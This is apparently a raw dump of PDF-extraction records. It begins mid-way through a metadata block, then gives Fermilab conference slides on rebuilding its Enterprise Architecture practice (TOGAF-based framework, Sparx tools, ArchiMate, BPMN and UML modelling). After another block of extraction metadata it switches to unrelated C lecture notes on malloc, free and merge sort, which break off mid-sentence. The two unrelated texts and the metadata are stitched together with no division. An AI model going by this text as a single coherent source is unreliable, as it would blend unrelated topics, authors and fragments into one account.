14715, null], [14715, 14715, null], [14715, 14862, null], [14862, 15359, null], [15359, 15370, null], [15370, 15644, null], [15644, 15810, null], [15810, 15833, null], [15833, 16018, null], [16018, 16214, null], [16214, 16236, null], [16236, 16430, null], [16430, 16438, null], [16438, 16569, null], [16569, 16616, null], [16616, 16792, null], [16792, 17248, null], [17248, 17365, null], [17365, 17462, null], [17462, 17509, null], [17509, 17556, null], [17556, 17589, null], [17589, 18079, null], [18079, 18498, null], [18498, 18664, null], [18664, 18724, null], [18724, 18743, null], [18743, 18754, null], [18754, 20269, null], [20269, 20278, null], [20278, 20278, null], [20278, 20278, null], [20278, 20625, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20625, null]], "pdf_page_numbers": [[0, 124, 1], [124, 378, 2], [378, 490, 3], [490, 508, 4], [508, 644, 5], [644, 705, 6], [705, 1027, 7], [1027, 1161, 8], [1161, 1278, 9], [1278, 1375, 10], [1375, 1393, 11], [1393, 1547, 12], [1547, 1547, 13], [1547, 1687, 14], [1687, 1797, 15], [1797, 1836, 16], [1836, 1854, 17], [1854, 1893, 18], [1893, 2169, 19], [2169, 2363, 20], [2363, 2439, 21], [2439, 2653, 22], [2653, 2880, 23], [2880, 2923, 24], [2923, 2930, 25], [2930, 3061, 26], [3061, 3266, 27], [3266, 3507, 28], [3507, 3522, 29], [3522, 3789, 30], [3789, 4364, 31], [4364, 4433, 32], [4433, 4523, 33], [4523, 4717, 34], [4717, 4988, 35], [4988, 5410, 36], [5410, 5578, 37], [5578, 6293, 38], [6293, 6612, 39], [6612, 6612, 40], [6612, 6628, 41], [6628, 6933, 42], [6933, 7249, 43], [7249, 7374, 44], [7374, 7780, 45], [7780, 8089, 46], [8089, 8427, 47], [8427, 8427, 48], [8427, 8427, 49], [8427, 8791, 50], [8791, 8791, 51], [8791, 8791, 52], [8791, 9073, 53], [9073, 9073, 54], [9073, 9090, 55], [9090, 9090, 56], [9090, 9090, 57], [9090, 9090, 58], [9090, 9090, 59], [9090, 9090, 60], [9090, 9095, 61], [9095, 9106, 62], [9106, 9120, 63], [9120, 9243, 64], [9243, 9660, 65], [9660, 9665, 66], [9665, 9674, 67], [9674, 9740, 68], [9740, 10249, 69], [10249, 10474, 70], [10474, 10491, 71], [10491, 10782, 72], [10782, 10919, 73], [10919, 11134, 74], [11134, 11154, 75], [11154, 11577, 76], [11577, 11923, 77], [11923, 11934, 78], [11934, 11941, 79], [11941, 12191, 80], [12191, 12304, 81], [12304, 12514, 82], [12514, 12950, 83], [12950, 13131, 84], [13131, 13360, 85], [13360, 13608, 86], [13608, 13845, 87], [13845, 13884, 88], [13884, 13941, 89], [13941, 14004, 90], [14004, 14089, 91], [14089, 14089, 92], [14089, 14222, 93], [14222, 14222, 94], [14222, 14222, 95], [14222, 14222, 96], [14222, 14245, 97], [14245, 14394, 98], [14394, 14454, 99], [14454, 14478, 100], [14478, 14697, 101], [14697, 14697, 102], [14697, 14715, 103], [14715, 14715, 104], [14715, 14862, 105], [14862, 15359, 106], [15359, 15370, 107], [15370, 15644, 108], [15644, 15810, 109], [15810, 15833, 110], [15833, 16018, 111], [16018, 16214, 112], [16214, 16236, 113], [16236, 16430, 114], [16430, 16438, 115], [16438, 16569, 116], [16569, 16616, 117], [16616, 16792, 118], [16792, 17248, 119], [17248, 17365, 120], [17365, 17462, 121], [17462, 17509, 122], [17509, 17556, 123], [17556, 17589, 124], [17589, 18079, 125], [18079, 18498, 126], [18498, 18664, 127], [18664, 18724, 128], [18724, 18743, 129], [18743, 18754, 130], [18754, 20269, 131], [20269, 20278, 132], [20278, 20278, 133], [20278, 20278, 134], [20278, 20625, 135]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20625, 0.02238]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
b5157e6413ed4eb882d9e9d848006d0a7a447e80
Realigning the Enterprise Architecture Practice to achieve lab missions Rennie Scott - Tammy Whited presenting NLIT Summit 2022 19 October 2022 FERMILAB-SLIDES-22-205-OCIO Abstract Today's DOE Labs face the ever-increasing requirement of managing and responding to the accelerating environments of complexity and disruptive change. Adapting to this challenge requires holistic analysis, system thinking, and meticulous attention to detail. Fermilab's Office of Enterprise Architecture was identified as the area of investment to respond to the growing challenge. This presentation will be a descriptive overview of Fermilab's initiative to re-examine and refresh its approach to Enterprise Architecture. It will cover the revised vision, scope, developments, challenges, and lessons learned. It will go into depth on developing solutions for new capabilities, tools, and practices that are the areas targeted for maturity and growth. Finally, we will provide the current milestones we've achieved and the trending results. Finally, the presentation will close with an overview of the future steps on our roadmap goal of maximizing value to our stakeholders. The Core Computing Division (CCD) was a division of the Computing Sector responsible for delivering technology services to the Fermilab community that would be considered "classic" IT functions, e.g., email, virtual servers, and networking. As with other IT organizations, they also provide domain-specific technology solutions, e.g., HR, Finance, Facilities, etc. The demand for these domain-specific technologies is managed and prioritized by the Information System Portfolio Management Team (IS-PMT). A somewhat formalized but "Agile" method by which the domain areas request the new services they would like CCD to schedule for the upcoming fiscal years. The process worked well, but growing pressures on all areas of the lab and accelerating demands for digital transformation require refinement and maturation. The Growing Challenges An overview of the growing challenges to Computing value creation While CCD delivers a lot of value to individual stakeholders, the domains, including computing, can be very siloed in their interpretation of priorities. Communication Across Domain Silos Experts can conceptualize things differently when communicating across domains (even in the same organization). Although illustrated in the humorous 1970s cartoon “The Tree Swing” metaphor,” we often forget this when we get into the details of a solution… Figure 2 ¹,² ¹ Image Source: The Cheeky Monkey Media Blog “User Stories are the Rosetta Stone to Becoming Tech-lingual” https://www.cheekymonkeymedia.ca/blog/user-stories-are-the-rosetta-stone-to-becoming-tech-lingual/ Aligning on Outcomes Often expert stakeholders will give you solutions to implement instead of collaborating on the details of what they are trying to achieve. This typically doesn’t provide optimal solutions for domain stakeholders or Computing. Figure 3 1 (Rennie Scott, 2022) NLIT 2022 Conference, Fermilab Managing Complexity What can seem like a straightforward project can get more and more complex as you start to find a solution and understand the data, systems, and microservices that the final solution must integrate. We needed a broader landscape approach Computing needs a way to focus on managing these stakeholder engagements to understand better and manage the technical, risk, and complexity of these projects before they go to the technical experts. • Let's focus on maturing and building out our Enterprise Architecture Capability. • Wrinkle! Our Enterprise Architect resigned. • Opportunity! Three senior internal staff have approached with interest in filling the role. The Choice All three candidates bring different but equally valuable and needed aspects of the Enterprise Architect role. But they also need to continue the vital work they’re involved in. Here is the proposal: • Tammy will be the Enterprise Architect at 50% FTE allocation • Craig and Rennie will be Co-Deputy Enterprise Architects at 25% allocation each. RoadMap • Year 1 – Acclimate to the role and develop the EA maturity plan project. • Year 2 – Budget allocation to implement new EA Practice Project and tools using new projects for refinement • Year 3 – If the experiment work is positive and there is actual value creation, we may reallocate all three as 100% FTE to the Enterprise Architect roles An overview of progress in Year 1 Year 1 - Overview • Roadmap Targets: – Acclimate to the role, identify areas of focus – Develop a Year 2 plan for developing the practice Year 1: Identified areas for maturity - **Demand Management** - Tammy, designated as the Demand Manager, worked with Deputy CIO on engaging with the business stakeholders to roadmap future projects through the IS-PMT workflow. - **Risk Management** - Rennie was assigned to sit on the Enterprise Risk Management Board as the Computing Risk Manager. - **Requirements Engineering** - Craig assigned development and continued maturing of the requirements engagement framework. - **Modeling & Design** - Rennie was designated the EA Repository Manager and began modeling critical areas of the Demand process and Service Management. Year 1: Identified areas for maturity (continued) • Managing Architecture Governance and Architectural Change – Tammy leads the development of the EA governance framework • Re-established bi-weekly Community Collaboration Meeting for computing staff presentations of cross-enterprise technical initiatives. • She established the Technical Risk Assessment sub-group in collaboration with cybersecurity. • We have implemented phase one technical procurement approval workflow. • Application Portfolio Management & SQA Program – Rennie assigned as Application Portfolio Manager – Expand the Lab capabilities model for a capabilities-based planning model to rationalize and align application lifecycles. • Mature the Solution Architect Role – Craig continues maturing, defining the Solution Architect role, and developing repeatable project engagements and deliverables. Model the IS-PMT Process Architecture An overview of progress in Year 2 Year 2 – Plan To Build the EA Practice Received funding to renovate the practice: • Contracted Enterprise Architecture consultants to advise us on best practices: – Select EA Frameworks – Get Focused on EA training – Develop EA Processes • Modeling and the EA repository • Evaluated and select EA Tools An overview of our selected EA Frameworks - TOGAF® - Fermilab Enterprise Architecture Framework All the architects were TOGAF® 9.2 trained and began working on IS-PMT Projects using the Architectural Development Method (ADM) and Business, Application, Data, Technology (BDAT) Architecture approach. The TOGAF® standard is a methodology and framework for planning, designing, implementing, and governing enterprise information technology architectures. It was developed and is managed by The Open Group and additional information can be found on its site: [https://www.opengroup.org](https://www.opengroup.org) Fermilab Enterprise Architecture Framework (FLEAF) - Working with the consultants, we developed the FLEAF architecture: - A customize framework utilizing: - TOGAF® - IT4IT® - BPMN® - Archimate® - FEAF - ITIL® - IT-CMF - NIST Cybersecurity Framework - APQC Process Classification Framework - The entire framework specification is 66 pages; several highlighted overviews follow in the next slides. FLEAF Services Context Vision Mission Goals Operating Model Business Strategy IT Strategy Portfolio Planning AS-IS Enterprise Architecture Intermediate Business Architecture Information Architecture Application Architecture Technology Architecture TO-BE Business Architecture Information Architecture Application Architecture Technology Architecture EA Repository Enterprise Roadmap Standards and Governance Architecture Review Board Reference Architectures Reusable Assets Transformation Projects The FLEAF Metamodel Author: Daniel Lambert - Copyright 2022 – All Rights Reserved Overview of our Enterprise Architecture Tools Year 1 - Architecture Tools • We started with Open-Source Tools: – Archi – for small architecture models – Camunda Modeler – for BPMN models – StarUML – for small contained UML models – Continued to use Visio for stakeholder engagements By Year 2, we needed to grow our capabilities to a platform that would offer the following capabilities: - Act as our centralized TOGAF repository - Native format version control - Model collaboration tools - Integration options to resource legacy artifacts and documentation - Granular user and group access controls - Easy and controllable user access to models for review, approval, and comment - Integrate with our CMDB, project portfolio, and Service Management system; ServiceNow. - Be able to scale and provide future capabilities without much technical overhead. We selected Sparx Systems Suite for our toolset: - **Sparx Enterprise Architect** – for modeling and requirements management - **Sparx Pro-Cloud Server** – Repository service and integration with ServiceNow for live information integration and service processes - **Sparx Prolaborate** – Customizable web service interface for stakeholder, management, and technical SME access to models and artifacts for comment, reference, and informational uses The Repository Architecture 20100 - Sparx EA Application Architecture * Future State Architecture for Sparx Enterprise Architecture Products * Sparx Enterprise Architecture Desktop Clients * Sparx Pro Cloud Server * Sparx ProLegrate Architects & Modelers flows Sparx EA < Client Applications > Supporting Services - Active Directory - SAML - SMTP - ServiceNow Sparx EA Application Service serves ResAPI HTTPS BDS Sparx Pro Cloud Server < Server Applications > Application Databases - EA Repository - ProLerate Database Sparx ProLerate < Server Applications > Supporting Services - ODBC Technology Services - EA Server - Windows Server - Asp.Net - IIS - Database Server - ODBC/OLED8 - MySQL Server Business Users Developers & Architects Web Browser serves serves serves serves realizes realizes Year 2 - Modeling Our modeling framework and approach "Telling stories with visuals is an ancient art. We’ve been drawing pictures on cave walls for centuries. It’s like what they say about the perfect picture book. The art and the text stand alone, but together, they create something even better.” – Deborah Wiles. Architecture Principle: EA will develop communication, perspectives, and architectural governance models whenever feasible. - Previously, we leveraged models and diagrams to communicate complex ideas and solutions across business, scientific, technical, and management domains. - Comprehending complex topics can take many iterations of discussions and reinterpretations across organizations. Visual representations using well-delineated models facilitate rapid understanding and correct false assumptions and specific areas of stakeholder concerns. - Holistic visual models used in conjunction with requirements or user stories and data models help developers to focus on the end user’s goals and increase inherent modularity for future expansion and solution maintainability. This reduces technical debt and increases change delivery. - This is not inherently a matter of how intelligent people are; it is biologically the way human cognition functions.” Our brains process visual content at an incredibly high speed. In fact, by one estimate, visuals communicate information 60,000 times faster than text.” 1 Erin McCoy, 2019 How Our Brains Are Hardwired For Visual Content: https://killervisualstrategies.com/blog/how-our-brains-are-hardwired-for-visual-content.html Chosen Modeling Languages & Model Framework - Archimate - the Architectural Landscape Container Framework - BPMN – Business Process and Workflow modeling - UML & Visio - Application and Technology modeling ArchiMate® is an enterprise architecture visual modeling language for use in modeling the strategy, business processes, information flow, infrastructure, and systems of an organization. It is excellent for abstracting high-level architectural landscapes to empower stakeholders to assess and consequences and impacts of decisions and changes. The ArchiMate® 3.1 language and specification was developed and is managed by The Open Group; additional information can be found on its site: https://www.opengroup.org # ArchiMate Structure and Behavior Elements The ArchiMate® language is much too rich to cover in this presentation, but a summary of the elements is included below from the specification. Several models will also be presented through the rest of the presentations for examples. ## ArchiMate Structure and Behavior Elements <table> <thead> <tr> <th>Element</th> <th>Specializations</th> <th>Definition</th> <th>Notation</th> </tr> </thead> <tbody> <tr> <td><strong>Active Structure</strong></td> <td></td> <td></td> <td></td> </tr> <tr> <td>Internal active structure element</td> <td>Represents an entity that is capable of performing behavior.</td> <td>Internal active structure element</td> <td></td> </tr> <tr> <td>Collaboration</td> <td>Represents an aggregate of two or more internal active structure elements, working together to perform some collective behavior.</td> <td>Collaboration</td> <td></td> </tr> <tr> <td>Interface (external active structure element)</td> <td>Represents a point of access where one or more services are exposed to the environment.</td> <td>Interface</td> <td></td> </tr> </tbody> </table> ## Behavior <table> <thead> <tr> <th>Element</th> <th>Specializations</th> <th>Definition</th> <th>Notation</th> </tr> </thead> <tbody> <tr> <td>Internal behavior element</td> <td>Represents a unit of activity that can be performed by one or more active structure elements.</td> <td>Internal behavior element</td> <td></td> </tr> <tr> <td>Process</td> <td>Represents a sequence of behaviors that achieves a specific result.</td> <td>Process</td> <td></td> </tr> <tr> <td>Function</td> <td>Represents a collection of behavior based on specific criteria, such as required resources, competencies, or location.</td> <td>Function</td> <td></td> </tr> <tr> <td>Interaction</td> <td>Represents a unit of collective behavior that must be performed by two or more active structure elements, either assigned directly or aggregated in a collaboration.</td> <td>Interaction</td> <td></td> </tr> <tr> <td>Service (external behavior element)</td> <td>Represents an explicitly defined exposed behavior.</td> <td>Service</td> <td></td> </tr> <tr> <td>Event</td> <td>Represents a state change.</td> <td>Event</td> <td></td> </tr> </tbody> </table> ## Passive Structure <table> <thead> <tr> <th>Element</th> <th>Specializations</th> <th>Definition</th> <th>Notation</th> </tr> </thead> <tbody> <tr> <td>Passive structure element</td> <td>Represents an element on which behavior is performed.</td> <td>Passive structure element</td> <td></td> </tr> </tbody> </table> ## Structural Relationships <table> <thead> <tr> <th>Structural Relationships</th> <th>Notation</th> <th>Role Names</th> </tr> </thead> <tbody> <tr> <td>Composition</td> <td>← composed of</td> <td>← composed in</td> </tr> <tr> <td>Aggregation</td> <td>← aggregates</td> <td>← aggregated in</td> </tr> <tr> <td>Assignment</td> <td>← assigned to</td> <td>← has assigned</td> </tr> <tr> <td>Realization</td> <td>← realizes</td> <td>← realized by</td> </tr> </tbody> </table> ## Dependency Relationships <table> <thead> <tr> <th>Dependency Relationships</th> <th>Notation</th> <th>Role Names</th> </tr> </thead> <tbody> <tr> <td>Serving</td> <td>← serves</td> <td>← served by</td> </tr> <tr> <td>Access</td> <td>← accesses</td> <td>← accessed by</td> </tr> <tr> <td>Influence</td> <td>← influences</td> <td>← influenced by</td> </tr> <tr> <td>Association</td> <td>← associated with</td> <td>← associated from</td> </tr> </tbody> </table> ## Dynamic Relationships <table> <thead> <tr> <th>Dynamic Relationships</th> <th>Notation</th> <th>Role Names</th> </tr> </thead> <tbody> <tr> <td>Triggering</td> <td>← triggers</td> <td>← triggered by</td> </tr> <tr> <td>Flow</td> <td>← flows to</td> <td>← flows from</td> </tr> </tbody> </table> ## Other Relationships <table> <thead> <tr> <th>Relationship Connectors</th> <th>Notation</th> <th>Role Names</th> </tr> </thead> <tbody> <tr> <td>Specialization</td> <td>← specializes</td> <td>← specialized by</td> </tr> </tbody> </table> ## Relationship Connectors <table> <thead> <tr> <th>Relationship Connectors</th> <th>Notation</th> <th>Role Names</th> </tr> </thead> <tbody> <tr> <td>Junction</td> <td></td> <td></td> </tr> </tbody> </table> Fermilab Model Example MongoDB(Service) As-Is MongoDB Service Service Realization Viewpoint Rev 1.0 Mar 15, 2021 Rennie Scott Legend - Application Component - Application Service - Business Actor - Business Service - Device - Junction - Node - Technology Service Deeper Business Modeling Details: BPMN • To drill deeper into the ArchiMate® business process elements, we’ve adopted the Object Management Group® (OMG) Business Process Modeling and Notation Standard (BPMN™). • BPMN™ is an open standard notation visual modeling language for business analysis, applications, and enterprise process workflows. • We’ve recently acquired Bpanda an application that will allow business organizations and stakeholders to enter in-text steps that will generate first-pass BPMN diagrams that can then be imported into the repository. Finally, to drill deeper into Application and Technical ArchiMate® elements, we’ve adopted the Object Management Group® (OMG) Unified Modeling Language (UML) An open modeling language used for constructing and documenting software, complex systems, and artifacts. We model UML in Sparx Enterprise Architect, import UML XML specification files, or hyperlink them in the repository. We can also import or link to Visio artifacts. Fermilab Model Example UML - Use Case Model for a Host Management Sub-System Model::Hosts - Business Use Case - Submit a change to the existing host list - Add a new Affiliation Host - Remove an Affiliation Host - Change a Hosts Priority - Approve changes to the Affiliation Hosts List - Receive notifications of Changes to the hosts list Participants: - Submitter - Division Head - Affiliation Rep - Users Office - Visa Office - FVA Office Manager Having just completed Year 2 an overview of our Year 3 Plans Year 3 - Plans • All three of the enterprise architects are now at 100% FTE • Having implemented many foundational pillars in Year 2, we are currently focused on connecting them across the landscape. • Develop and operationalize our EA services with standardized and repeatable deliverables. • Implement connected workflows and automation for governance. • Develop a one-stop portal for EA service requests, repository models, KPI, and digital portfolio access. • Roadmap planning to continue the march towards establishing Enterprise Architecture as a Fermilab Center of Excellence. Value Creation of the Initiative - Common communication tool - A standard method for modernization initiatives - Controlled project artifacts - Foundation for SQA and Risk Management lab processes - Better stakeholder identification - Outcomes better understood by all Conclusion Thank you for allowing us to share our journey thus far with you. If you would like to discuss anything covered in this presentation or would like further details, please reach out to one of the Fermilab Enterprise Architecture Team: - Tammy Whited twhited@fnal.gov - Craig Mohler cmohler@fnal.gov - Rennie Scott rennie@fnal.gov Extra Materials Additional model examples Fermilab Model Example Service Catalog Management (Business Architecture) Fermilab Model Example Centralized Repository Management To-Be (draft) Fermilab Model Example Centralized Repository Management To-Be (draft) Potential Customers - Experiments - Affiliations - Scientific Computing Division - Office of the CIO - Core Computing Division Current Customers - Customer: PIP II - Customer: SQMS Open Questions: - Who's accountable/responsible for the individual repository access & permission? - License Management and funding at scale? - Customer facing Git Repo SME Business Service? - Overlapping service capabilities consolidation and reduction opportunities? Legend: - application service - business actor - business interface - business service - grouping - product - technology service Complete Fermilab Service Management Model Strategic Viewpoint
{"Source-Url": "https://lss.fnal.gov/archive/2022/slides/fermilab-slides-22-205-ocio.pdf", "len_cl100k_base": 4642, "olmocr-version": "0.1.53", "pdf-total-pages": 47, "total-fallback-pages": 0, "total-input-tokens": 61982, "total-output-tokens": 5987, "length": "2e12", "weborganizer": {"__label__adult": 0.0005717277526855469, "__label__art_design": 0.004848480224609375, "__label__crime_law": 0.0006451606750488281, "__label__education_jobs": 0.012847900390625, "__label__entertainment": 0.0002675056457519531, "__label__fashion_beauty": 0.0003731250762939453, "__label__finance_business": 0.02008056640625, "__label__food_dining": 0.0005397796630859375, "__label__games": 0.0007586479187011719, "__label__hardware": 0.002918243408203125, "__label__health": 0.0008702278137207031, "__label__history": 0.0007872581481933594, "__label__home_hobbies": 0.0002560615539550781, "__label__industrial": 0.0041046142578125, "__label__literature": 0.0004336833953857422, "__label__politics": 0.0006427764892578125, "__label__religion": 0.0007085800170898438, "__label__science_tech": 0.29833984375, "__label__social_life": 0.00021159648895263672, "__label__software": 0.045135498046875, "__label__software_dev": 0.60302734375, "__label__sports_fitness": 0.00034737586975097656, "__label__transportation": 0.0009388923645019532, "__label__travel": 0.00037932395935058594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20483, 0.00993]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20483, 0.09983]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20483, 0.87717]], "google_gemma-3-12b-it_contains_pii": [[0, 174, false], [174, 1164, null], [1164, 1984, null], [1984, 2074, null], [2074, 2228, null], [2228, 2907, null], [2907, 3220, null], [3220, 3440, null], [3440, 4504, null], [4504, 5211, null], [5211, 5245, null], [5245, 5388, null], [5388, 6028, null], [6028, 6918, null], [6918, 6956, null], [6956, 6990, null], [6990, 7303, null], [7303, 7400, null], [7400, 7915, null], [7915, 8330, null], [8330, 8853, null], [8853, 8936, null], [8936, 8982, null], [8982, 9228, null], [9228, 9800, null], [9800, 10249, null], [10249, 11091, null], [11091, 11146, null], [11146, 12683, null], [12683, 12890, null], [12890, 13403, null], [13403, 16611, null], [16611, 16876, null], [16876, 17440, null], [17440, 17440, null], [17440, 17869, null], [17869, 18321, null], [18321, 18382, null], [18382, 18967, null], [18967, 19237, null], [19237, 19579, null], [19579, 19622, null], [19622, 19696, null], [19696, 19696, null], [19696, 19767, null], [19767, 20421, null], [20421, 20483, null]], "google_gemma-3-12b-it_is_public_document": [[0, 174, true], [174, 1164, null], [1164, 1984, null], [1984, 2074, null], [2074, 2228, null], [2228, 2907, null], [2907, 3220, null], [3220, 3440, null], [3440, 4504, null], [4504, 5211, null], [5211, 5245, null], [5245, 5388, null], [5388, 6028, null], [6028, 6918, null], [6918, 6956, null], [6956, 6990, null], [6990, 7303, null], [7303, 7400, null], [7400, 7915, null], [7915, 8330, null], [8330, 8853, null], [8853, 8936, null], [8936, 8982, null], [8982, 9228, null], [9228, 9800, null], [9800, 10249, null], [10249, 11091, null], [11091, 11146, null], [11146, 12683, null], [12683, 12890, null], [12890, 13403, null], [13403, 16611, null], [16611, 16876, null], [16876, 17440, null], [17440, 17440, null], [17440, 17869, null], [17869, 18321, null], [18321, 18382, null], [18382, 18967, null], [18967, 19237, null], [19237, 19579, null], [19579, 19622, null], [19622, 19696, null], [19696, 19696, null], [19696, 19767, null], [19767, 20421, null], [20421, 20483, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20483, null]], "pdf_page_numbers": [[0, 174, 1], [174, 1164, 2], [1164, 1984, 3], [1984, 2074, 4], [2074, 2228, 5], [2228, 2907, 6], [2907, 3220, 7], [3220, 3440, 8], [3440, 4504, 9], [4504, 5211, 10], [5211, 5245, 11], [5245, 5388, 12], [5388, 6028, 13], [6028, 6918, 14], [6918, 6956, 15], [6956, 6990, 16], [6990, 7303, 17], [7303, 7400, 18], [7400, 7915, 19], [7915, 8330, 20], [8330, 8853, 21], [8853, 8936, 22], [8936, 8982, 23], [8982, 9228, 24], [9228, 9800, 25], [9800, 10249, 26], [10249, 11091, 27], [11091, 11146, 28], [11146, 12683, 29], [12683, 12890, 30], [12890, 13403, 31], [13403, 16611, 32], [16611, 16876, 33], [16876, 17440, 34], [17440, 17440, 35], [17440, 17869, 36], [17869, 18321, 37], [18321, 18382, 38], [18382, 18967, 39], [18967, 19237, 40], [19237, 19579, 41], [19579, 19622, 42], [19622, 19696, 43], [19696, 19696, 44], [19696, 19767, 45], [19767, 20421, 46], [20421, 20483, 47]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20483, 0.11404]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
867d4272177d960450f905778882ddd776e5b530
Dynamic Memory & ADTs in C Readings: CP:AMA 17.1, 17.2, 17.3, 17.4 The heap The *heap* is the final section in the C memory model. It can be thought of a big “pile” (or “pool”) of memory that is available to your program. Memory is **dynamically** “borrowed” from the heap. We call this *allocation*. When the borrowed memory is no longer needed, it can be “returned” and possibly *reused*. We call this *deallocating*. If too much memory has already been allocated, attempts to borrow additional memory fail. Unfortunately, there is also a *data structure* known as a heap, and the two are unrelated. To avoid confusion, prominent computer scientist Donald Knuth campaigned to use the name “free store” or the “memory pool”, but the name “heap” has stuck. A similar problem arises with “the stack” region of memory because there is also a Stack ADT. However, their behaviour is very similar so it is far less confusing. malloc The malloc (memory allocation) function obtains memory from the heap dynamically. It is provided in `<stdlib.h>`. ```c // malloc(s) requests s bytes of memory from the heap // and returns a pointer to a block of s bytes, or // NULL if not enough memory is available // time: O(1) [close enough for this course] ``` For example, if you want enough space for an array of 100 ints: ```c int *my_array = malloc(100 * sizeof(int)); ``` or an array of `n` struct posns: ```c struct posn *my_posn_array = malloc(n * sizeof(struct posn)); ``` You should always use `sizeof` with `malloc` to improve portability and to improve communication. Seashell will allow ```c int *my_array = malloc(400); ``` instead of ```c int *my_array = malloc(100 * sizeof(int)); ``` but the latter is much better style and is more portable. Strictly speaking, the type of the `malloc` parameter is `size_t`, which is a special type produced by the `sizeof` operator. `size_t` and `int` are different types of integers. Seashell is mostly forgiving, but in other C environments using an `int` when C expects a `size_t` may generate a warning. The proper `printf` placeholder to print a `size_t` is `%zd`. The declaration for the `malloc` function is: ```c void *malloc(size_t s); ``` The return type is a `(void *)` (void pointer), a special pointer that can point at any type. ```c int *pi = malloc(sizeof(int)); struct posn *pp = malloc(sizeof(struct posn)); ``` ```c int main(void) { int *arr1 = malloc(10 * sizeof(int)); int *arr2 = malloc(5 * sizeof(int)); //... } ``` An unsuccessful call to `malloc` returns `NULL`. In practice it’s good style to check every `malloc` return value and gracefully handle a `NULL` instead of crashing. ```c int *my_array = malloc(n * sizeof(int)); if (my_array == NULL) { printf("Sorry dude, I’m out of memory! I’m exiting....\n"); exit(EXIT_FAILURE); } ``` In the “real world” you should always perform this check, but in this course, you do **not** have to check for a `NULL` return value unless instructed otherwise. In these notes, we omit this check to save space. The heap memory provided by malloc is \textit{uninitialized}. ```c int *p = malloc(sizeof(int)); printf("the mystery value is: %d\n", *p); ``` Although malloc is very complicated, for the purposes of this course, you can assume that malloc is $O(1)$. There is also a \texttt{calloc} function which essentially calls malloc and then “initializes” the memory by filling it with zeros. \texttt{calloc} is $O(n)$, where $n$ is the size of the block. For every block of memory obtained through `malloc`, you must eventually `free` the memory (when the memory is no longer in use). ```c // free(p) returns memory at p back to the heap // requires: p must be from a previous malloc // effects: the memory at p is invalid // time: O(1) ``` In the Seashell environment, you must `free` every block. ```c int *my_array = malloc(n * sizeof(int)); // ... // ... free(my_array); ``` Invalid after free Once a block of memory is freed, reading from or writing to that memory is invalid and may cause errors (or unpredictable results). Similarly, it is invalid to free memory that was not returned by a malloc or that has already been freed. ```c int *p = malloc(sizeof(int)); free(p); int k = *p; // INVALID *p = 42; // INVALID free(p); // INVALID p = NULL; // GOOD STYLE ``` Pointer variables may still contain the address of the memory that was freed, so it is often good style to assign NULL to a freed pointer variable. Memory leaks A memory leak occurs when allocated memory is not eventually freed. Programs that leak memory may suffer degraded performance or eventually crash. ```c int *ptr; ptr = malloc(sizeof(int)); ptr = malloc(sizeof(int)); // Memory Leak! ``` In this example, the address from the original `malloc` has been overwritten. That memory is now “lost” (or leaked) and so it can never be freed. Garbage collection Many modern languages (including Racket) have a *garbage collector*. A garbage collector **detects** when memory is no longer in use and **automatically** frees memory and returns it to the heap. One disadvantage of a garbage collector is that it can be slow and affect performance, which is a concern in high performance computing. Merge sort In Section 09 we saw a Racket implementation of the divide and conquer algorithm merge sort that is $O(n \log n)$. In merge sort, the data is split into two smaller groups. After each smaller group is sorted, they are merged together. To simplify our C implementation, we will use a merge helper function. merge(dest, src1, len1, src2, len2) modifies dest to contain the elements from both src1 and src2 in sorted order requires: length of dest is at least (len1 + len2) src1 and src2 are sorted effects: modifies dest time: O(n), where n is len1 + len2 ```c void merge(int dest[], const int src1[], int len1, const int src2[], int len2) { int pos1 = 0; int pos2 = 0; for (int i=0; i < len1 + len2; ++i) { if (pos1 == len1 || (pos2 < len2 && src2[pos2] < src1[pos1])) { dest[i] = src2[pos2]; ++pos2; } else { dest[i] = src1[pos1]; ++pos1; } } } ``` void merge_sort(int a[], int len) { if (len <= 1) return; int llen = len / 2; int rlen = len - llen; int *left = malloc(llen * sizeof(int)); int *right = malloc(rlen * sizeof(int)); for (int i=0; i < llen; ++i) left[i] = a[i]; for (int i=0; i < rlen; ++i) right[i] = a[i + llen]; merge_sort(left, llen); merge_sort(right, rlen); merge(a, left, llen, right, rlen); free(left); free(right); } This implementation of merge sort is also $O(n 